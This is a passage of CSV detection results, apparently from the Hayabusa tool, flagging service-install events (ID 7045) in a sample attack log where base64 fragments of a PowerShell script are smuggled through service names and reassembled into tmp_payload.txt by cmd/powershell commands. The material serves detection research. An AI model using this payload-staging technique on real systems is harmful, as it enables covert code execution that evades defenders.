+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:55.362 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIA0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgQXBwbGljYXRpb24gRXZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRBcHBsaWNhdGlvbk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:56.815 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: luZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBBcHBsaWNhdGlvbiAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAkQXBwbGljYXRpb25FUFMgPSAkQXBwbGljYXRpb25JbmZv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:58.263 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:58.263 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: LkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lID0gJEFwcGxpY2F0aW9uSW5mby5TdGFydFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvbkxhc3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:17:59.742 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RFdmVudFRpbWUgPSAkQXBwbGljYXRpb25JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzID0gJEFwcGxpY2F0aW9uSW5mby5Ub3RhbEV2ZW50cw0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg114"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:01.196 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgJEFwcGxpY2F0aW9uRXZlbnRMb2dTaXplID0gJEFwcGxpY2F0aW9uSW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU2VjdXJpdHkgRX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:02.650 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZlbnQgbG9nIGluZm8NCiAgICAgICAgICAgICRTZWN1cml0eUluZm8gPSBHZXQtRXZlbnRMb2dJbmZvICRDb21wdXRlciBTZWN1cml0eSAkUmVtb3RlQ29tcHV0ZXIgJE9TDQogICAgICAgICAgICAk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:04.105 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U2VjdXJpdHlFUFMgPSAkU2VjdXJpdHlJbmZvLkF2ZXJhZ2VFdmVudHMNCiAgICAgICAgICAgICRTZWN1cml0eUZpcnN0RXZlbnRUaW1lID0gJFNlY3VyaXR5SW5mby5TdGFydFRpbWUNCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:05.542 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICRTZWN1cml0eUxhc3RFdmVudFRpbWUgPSAkU2VjdXJpdHlJbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTZWN1cml0eVRvdGFsRXZlbnRzID0gJFNlY3VyaXR5SW5mby5Ub3RhbEV2ZW50 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:06.982 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:18:06.982 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cw0KICAgICAgICAgICAgJFNlY3VyaXR5RXZlbnRMb2dTaXplID0gJFNlY3VyaXR5SW5mby5Mb2dTaXplDQogICAgICAgICAgICANCg0KICAgICAgICAgICAgIyBSZXRyaWV2ZSB0aGUgU3lzdGVtIE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
